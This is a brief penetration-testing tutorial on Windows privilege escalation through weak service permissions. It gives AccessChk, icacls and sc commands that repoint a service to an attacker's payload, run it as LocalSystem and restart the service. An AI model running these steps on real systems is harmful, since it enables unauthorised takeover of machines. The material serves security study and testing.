
Insecure Service Permissions

A service can still be abused even if the Discretionary Access Control List (DACL) on the service's executable is well configured and the service binary path is correctly quoted.

If the service DACL (as opposed to the executable's DACL) allows us to modify the configuration of the service, we can reconfigure it. This lets us point the service at any executable.

Analyzing the Service

We can use AccessChk to check a service's DACL. In the output we can see that the BUILTIN\Users group has SERVICE_ALL_ACCESS, which means it can reconfigure the service.

:: Accept the Eula
accesschk /accepteula

:: Query Service Information
accesschk -qlc "VulnerableService"


Changing the Service Executable

Note

If another user needs to execute the payload, we must grant the appropriate permissions on the service executable. In this case we grant full access (F) to the Everyone group: Everyone:(F)

Note

Modifying the service. We chose LocalSystem as it is the highest-privileged account available.

:: Generate the payload of your preference and assign the correct permissions
:: Assign new Permissions
icacls C:\Payload\Path\Payload.exe /grant Everyone:F

:: Changing the Service associated Executable
sc config VulnerableService binPath= "C:\Payload\Path\Payload.exe" obj= LocalSystem

Restarting the Service

Note

Normally, if we do not have the permissions required to restart the service, we would have to wait for it to restart on its own.

If we do have the required permissions, we can restart the service with the sc command.

sc stop  "VulnerableService"
sc start "VulnerableService"